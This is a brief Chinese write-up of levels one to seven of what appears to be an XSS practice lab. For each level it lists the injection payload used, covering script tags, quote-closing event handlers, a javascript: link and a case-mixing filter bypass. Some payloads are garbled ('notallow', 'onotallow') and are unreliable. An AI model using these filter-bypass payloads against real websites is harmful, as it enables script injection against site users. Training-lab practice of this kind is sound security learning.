文章目录

• ​​第一关​​
• ​​第二关--闭合​​
• ​​第三关​​
• ​​第四关太简单了​​
• ​​第五关--过滤了on关键字​​
• ​​第六关--大小写绕过懒的截图​​
• ​​第七关--补充撮合​​

第一关

没有任何的过滤，直接得到​​name=<script>alert()</script>​​

第二关–闭合

发现是在Value里面很简单闭合前面和后面即可，我的一种方案是

​​"onload="alert();""​​

第三关

发现没啥用处,最后尝试出​​'notallow="alert(1)​​

第四关太简单了

​​" onfocus="alert(/xss/)​​

第五关–过滤了on关键字

考虑用a标签,​​<a href="javascript:alert()">666</a>​​

第六关–大小写绕过懒的截图

" ONmouseover="alert(/xss/)

第七关–补充撮合

​​" onotallow="alert()​​